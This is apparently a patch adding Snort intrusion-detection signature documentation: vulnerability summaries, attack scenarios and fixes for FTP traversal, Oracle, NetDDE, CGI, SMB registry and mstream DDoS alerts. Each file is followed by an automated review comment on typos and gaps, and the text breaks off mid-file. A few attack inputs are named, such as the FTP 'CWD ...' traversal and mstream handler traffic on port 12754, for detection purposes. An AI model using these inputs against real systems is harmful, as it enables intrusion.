+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been 
+taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
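Review bot: "Information gathering possible administrator access." under Impact is missing a conjunction; "Information gathering and possible administrator access." In Detailed Information, "on the host, this may be the prelude" is a comma splice; split it into two sentences or use a semicolon. The Attack Scenarios paragraph is a single over-long line and should be wrapped like the rest of the file. Additional References is empty and has two blank lines before the closing "--".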
--- /dev/null
+++ b/doc/signatures/1779.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1779
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a directory traversal vulnerability associated with the Shambala FTP server. 
+
+--
+Impact:
+Information disclosure.  A successful attack may permit the navigation of directories and the viewing of files. 
+
+--
+Detailed Information:
+The Shambala FTP server may be susceptible an a directory traversal attack that permits the navigation and viewing of files in directories other than the intended FTP server's root directory. This exploit is conducted by executing the FTP command "CWD ..." or "cd ...".  This may possibly permit the identification and the viewing of files containing sensitive information.
+
+--
+Affected Systems:
+Shambala 4.5 FTP server running on Windows 95, 98, NT, and Windows 2000.
+
+--
+Attack Scenarios:
+An attacker may attempt to exploit this vulnerability to identify and view files on the vulnerable FTP server. 
+
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version or restrict anonymous FTP user access by assigning appropriate file permissions.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Miscellaneous:
+http://www.securiteam.com/windowsntfocus/5SP011P4KC.html
+
+--
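Review bot: typo in Detailed Information, "may be susceptible an a directory traversal attack" should read "may be susceptible to a directory traversal attack", and "the intended FTP server's root directory" reads better as "the FTP server's intended root directory". The Ease of Attack line and the Brian Caswell contributor line carry trailing whitespace, and there is a stray extra blank line after Attack Scenarios.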
--- /dev/null
+++ b/doc/signatures/3447.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3447
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
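Review bot: "false postives from occuring" is misspelled twice (Summary and Detailed Information); it should be "false positives from occurring". The Affected Systems entry "NA" is tab-indented while the other NA entries in this file are flush left; keep them consistent. Since the rule generates no event on its own, Detailed Information should also name the rules it is used with, so an operator who disables it knows which detections depend on it.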
--- /dev/null
+++ b/doc/signatures/1471.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1471
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
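Review bot: the Summary only says "a known vulnerability in a CGI web application" and never names the CGI script or vulnerability that SID 1471 matches, so the document does not tell an analyst what triggered the event; add the matched URI and a reference under Additional References, which is empty. In Detailed Information, "running ona web server" should be "running on a web server", "attackers choosing" should be "attacker's choosing" (here and in Impact), and the line "relationships between the victim server and other hosts can be exploited by the attacker." exceeds the wrap width used by the rest of the file.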
--- /dev/null
+++ b/doc/signatures/122-24.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-24
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a udp
+filtered distributed portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
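Review bot: spelling in Impact and Detailed Information: "reconnaisance" should be "reconnaissance" and "consititute" should be "constitute". The Summary describes a "udp filtered distributed portscan" without saying what "filtered" means in sfPortscan terms; a one-line definition, or a pointer to the section of README.sfportscan that defines it, would save the reader a trip to the preprocessor docs.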
--- /dev/null
+++ b/doc/signatures/2618.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2618
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "alter_mview_propagation" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck632.html
+
+--
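Review bot: the sentence in Detailed Information about setting $ORACLE_PORTS to "any" on Windows servers is a sensor configuration instruction, not a description of the vulnerability, and it gives no reason for the setting; move it under Corrective Action or a note of its own and state why Windows installations need it. Also "a Oracle database" should be "an Oracle database" (Summary), "logon to the database" should be "log on to the database" (Attack Scenarios), and the Affected Systems entry is indented with eight spaces where the other files use a tab. Ease of Attack "Simple." sits uneasily with the Attack Scenarios statement that a valid username and password are required; note that precondition in the Ease of Attack line as well.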
--- /dev/null
+++ b/doc/signatures/3192.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+3192
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a host via a
+vulnerability in Windows Media Player.
+
+--
+Impact:
+Serious. Code execution leading to unauthorized administrative access
+to the target host.
+
+--
+Detailed Information:
+A directory traversal vulnerability in Windows Media Player can be
+exploited via a malicious skin file downloaded from a remote machine.
+This may allow an attacker to execute code of their choosing on an
+affected host and gain administrative access to that host.
+
+--
+Affected Systems:
+	Microsoft Windows Media Player 7.1
+	Windows Media Player for Windows XP
+
+--
+Attack Scenarios:
+An attacker can create a malformed skin file and make it available for
+automatic download and installation by a user.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+
+--
+Additional References:
+
+--
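Review bot: Additional References is empty for a Windows Media Player code-execution issue that has a vendor bulletin; cite it, since Corrective Action tells operators to apply the vendor patch without saying which one. Detailed Information calls the issue a directory traversal in a skin file but does not explain how that traversal leads to code execution, so a sentence on the mechanism would help analysts judge the Impact claim.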
--- /dev/null
+++ b/doc/signatures/2938.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2938
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
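Review bot: the Impact line "Serious. Execution of arbitrary code with system level privileges" and the Corrective Action line "Apply the appropriate vendor supplied patches" both lack a terminating period, unlike the rest of the file. Corrective Action lists "Disable the NetDDE service" while Detailed Information already says the service is not started by default; tell the reader to confirm the service's actual state rather than rely on that default.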
--- /dev/null
+++ b/doc/signatures/2432.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2432
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Denial of Service. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
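Review bot: the Affected Systems entry "ISC INN 2.4 .0" has a stray space in the version string and should read "ISC INN 2.4.0". Additional References is empty for a buffer overflow with a vendor advisory, so a reference should be added. Minor: "attackers choosing" should be "attacker's choosing", the "Rule:" line and the penultimate "--" separator carry trailing whitespace, and the Corrective Action line "Apply the appropriate vendor supplied patches" lacks a period.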
--- /dev/null
+++ b/doc/signatures/1553.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1553
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
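Review bot: this file is a verbatim copy of the 1471 document, including its typos ("running ona web server", "attackers choosing", the over-long line in Detailed Information) and its empty Additional References, and it still names no CGI script or vulnerability specific to SID 1553. Each of these generic CGI documents should at least state the URI the rule matches so an analyst can tell them apart.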
--- /dev/null
+++ b/doc/signatures/867.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+867
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
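Review bot: the Affected Systems section is empty; since the rule is described as targeting an authentication weakness in a web application, name the application or state explicitly that it applies to any web server running it. "running ona web server" in Detailed Information should be "running on a web server". Additional References is also empty.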
--- /dev/null
+++ b/doc/signatures/2131.txt
@@ -0,0 +1,72 @@
+Rule:
+--
+Sid: 2131
+
+--
+Summary:
+This event is generated when an attempt is made to access 
+/iisprotect/admin on a host running Microsoft Internet Information 
+Server (IIS).
+
+--
+Impact:
+An attacker may be able to perform administrative tasks on the server 
+without authorization and may be able to manipulate the database that 
+IISProtect by injecting and executing SQL statements.
+
+--
+Detailed Information:
+IISProtect is a third-party application that provides password 
+authentication to directories on IIS using a Web-based interface. An 
+attacker can bypass authentication by requesting a specific file with an
+encoded URI, and can then proceed to use SQL injection techniques to 
+execute arbitrary code with administrative privileges.
+
+--
+Affected Systems:
+Any host using any version of IISProtect below v2.2.0.9 with IIS.
+
+--
+Attack Scenarios:
+An attacker can use SQL injection to execute arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user accesses the IISProtect administration site,
+this rule may generate an event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Check the host for signs of compromise.
+
+Disallow access to the IISProtect administration site from sources 
+external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7661
+http://www.securityfocus.com/bid/7675
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11661
+
+--
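Review bot: the Impact sentence "may be able to manipulate the database that IISProtect by injecting and executing SQL statements" is missing a verb; "the database that IISProtect uses" reads correctly. The header puts "Sid: 2131" on one line and omits the blank line after "Rule:", unlike every other file in this patch, which places the SID on its own line; keep the layout uniform so tools that parse these files by field behave the same. False Positives correctly notes that legitimate administrators will trigger this rule; Corrective Action could add that, once external access is blocked, the event can be suppressed for the known administrative source addresses.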
--- /dev/null
+++ b/doc/signatures/1176.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1176
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running on a web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Attrition:
+http://www.attrition.org/security/advisory/misc/ecom-990420
+
+--
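Review bot: Affected Systems is empty while the Attrition reference points to a specific advisory; the affected product and versions from that advisory should be listed here. The rest of the text is the same generic authentication boilerplate used for SIDs 867 and 1860 and does not say what URI or application SID 1176 matches.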
--- /dev/null
+++ b/doc/signatures/1721.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1721
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
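Review bot: this is a third verbatim copy of the 1471 text (see also 1553) with the same typos ("running ona web server", "attackers choosing", the over-long line in Detailed Information) and an empty Additional References; SID 1721 is still not tied to any specific CGI script. Fix the shared text once and give each SID at least the matched URI.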
--- /dev/null
+++ b/doc/signatures/2941.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2941
+
+--
+Summary:
+This event is generated when an attempt is made to bind to the Windows
+registry service via SMB. 
+
+--
+Impact:
+Serious. Remote administration of the Windows reqistry may be possible.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to bind to the Windows
+registry service via SMB across the network.
+
+It may be possible for an attacker to manipulate the Windows registry
+from a remote location. This could give the attacker administrative
+privileges on the target host as well as the opportunity to execute code
+of their choosing.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If the Windows registry is accessible via SMB the attacker can
+manipulate the operating system registry settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
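Review bot: "Windows reqistry" in Impact should be "Windows registry". The Corrective Action item "Disallow remote registry manipulation" should say how, for example by stopping and disabling the Remote Registry service or restricting which accounts may connect to it, since the preceding items only address SMB reachability. Additional References is empty.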
--- /dev/null
+++ b/doc/signatures/100000616.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000616
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_search.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "link_search.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
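Review bot: the third paragraph of Detailed Information and the Attack Scenarios section paste the generic CGI credential-checking text ("validating the credentials of a client host", "supply his/her own credentials") into a document about a remote file include, where no credentials are involved; drop that text and describe the actual condition, a remote URL accepted in the "admin_template_path" parameter of "link_search.php" and included by the script. Also "exploitation attempt has been attempted" is redundant (use "an exploitation attempt has been made"), "running ona web server" should be "running on a web server", the blank line before "--" is missing after the Sid, Affected Systems and Contributors sections, and an extra blank line follows the final separator. Additional References is empty for an application-specific RFI.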
--- /dev/null
+++ b/doc/signatures/834.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+834
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
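Review bot: fourth verbatim copy of the 1471 document (also 1553 and 1721), with the same typos ("running ona web server", "attackers choosing", the over-long line), the same empty Additional References, and again no CGI script named for SID 834.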
--- /dev/null
+++ b/doc/signatures/247.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+247
+
+--
+Summary:
+This event is generated when an mstream DDoS client communicates with a handler.
+
+--
+Impact:
+Severe.  If the listed source IP is in your network, it may be an mstream client.  If the listed destination IP is in your network, it may be an mstream handler.
+
+--
+Detailed Information:
+The mstream DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. At the highest level, clients communicate with handlers to inform them to launch attacks.  A client may communicate with a handler using a TCP packet to destination port 12754 with a string of ">" in the payload.
+
+--
+Affected Systems:
+Any mstream compromised host.
+
+--
+Attack Scenarios:
+After a host becomes an mstream client, it will attempt to communicate with handlers. 
+
+--
+Ease of Attack:
+Simple. mstream code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+There are other known client-to-handler ports in addition to 12754.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+--
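Review bot: False Negatives says "There are other known client-to-handler ports in addition to 12754" but does not list them or point to the sibling mstream rules that cover them, so a reader cannot tell whether the gap is closed; name the ports or cross-reference the other SIDs. In Detailed Information, "a string of ">"" is ambiguous about whether the rule matches a single ">" character or a run of them; state the exact content match. Impact uses "Severe." while the other files in this patch use "Serious."; pick one term.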
--- /dev/null
+++ b/doc/signatures/1860.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1860
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
